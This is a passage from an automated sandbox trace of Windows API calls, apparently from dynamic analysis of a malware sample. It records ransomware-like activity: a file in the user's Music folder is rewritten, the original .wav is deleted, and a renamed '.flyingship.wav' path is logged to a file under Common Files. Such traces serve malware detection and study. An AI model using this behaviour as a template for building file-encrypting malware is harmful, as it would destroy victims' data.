out: hHeap=0x8a0000) returned 1 [0182.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0182.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0182.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0182.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0182.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0182.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0182.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0182.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0182.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0182.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0182.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0182.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0182.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0182.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0182.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0182.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0182.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0182.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0182.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0182.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0182.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0182.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0182.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0182.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0182.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.204] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0182.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd738, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0182.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0182.205] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0182.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0182.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0182.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0182.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0182.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0182.205] WriteFile (in: hFile=0x138, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0x18a5d, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0x18a5d, lpOverlapped=0x0) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0182.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0182.207] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0182.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0182.208] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.208] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.208] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.208] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.208] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0182.208] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.208] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.208] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.210] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.210] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.210] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.210] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.232] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav", lpFilePart=0x0) returned 0x53 [0182.233] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ad4f0, ftCreationTime.dwHighDateTime=0x1d5daa3, ftLastAccessTime.dwLowDateTime=0xa12b5b80, ftLastAccessTime.dwHighDateTime=0x1d5e5cc, ftLastWriteTime.dwLowDateTime=0x11d952c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x18a5d, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="R64I-TKxh1f.wav", cAlternateFileName="R64I-T~1.WAV")) returned 0x90ae18 [0182.233] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\r64i-tkxh1f.wav")) returned 1 [0182.242] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ad4f0, ftCreationTime.dwHighDateTime=0x1d5daa3, ftLastAccessTime.dwLowDateTime=0xa12b5b80, ftLastAccessTime.dwHighDateTime=0x1d5e5cc, ftLastWriteTime.dwLowDateTime=0x11d952c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x18a5d, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="R64I-TKxh1f.wav", cAlternateFileName="R64I-T~1.WAV")) returned 0 [0182.242] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0182.242] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.242] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.242] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0182.242] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0182.242] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.242] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.243] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.243] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0182.243] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0182.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0182.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.243] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0182.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0182.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0182.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.243] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0182.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0182.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0182.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0182.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0182.243] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0182.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0182.244] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0182.245] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.245] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0182.245] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.245] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0182.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0182.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.246] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0182.246] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1f4f, lpOverlapped=0x0) returned 1 [0182.247] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0182.247] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x1f4f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.247] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0182.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0182.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0182.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.flyingship.wav\r\n", cchWideChar=97, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 97 [0182.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x61) returned 0x8e8320 [0182.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.flyingship.wav\r\n", cchWideChar=97, lpMultiByteStr=0x8e8320, cbMultiByte=97, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 97 [0182.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0182.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0182.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0182.247] WriteFile (in: hFile=0x138, lpBuffer=0x906f38*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x906f38*, lpNumberOfBytesWritten=0x87f43c*=0x60, lpOverlapped=0x0) returned 1 [0182.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0182.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.247] CloseHandle (hObject=0x138) returned 1 [0182.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0182.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0182.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0182.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0182.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0182.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0182.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0182.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0182.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0182.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0182.250] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0182.250] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: 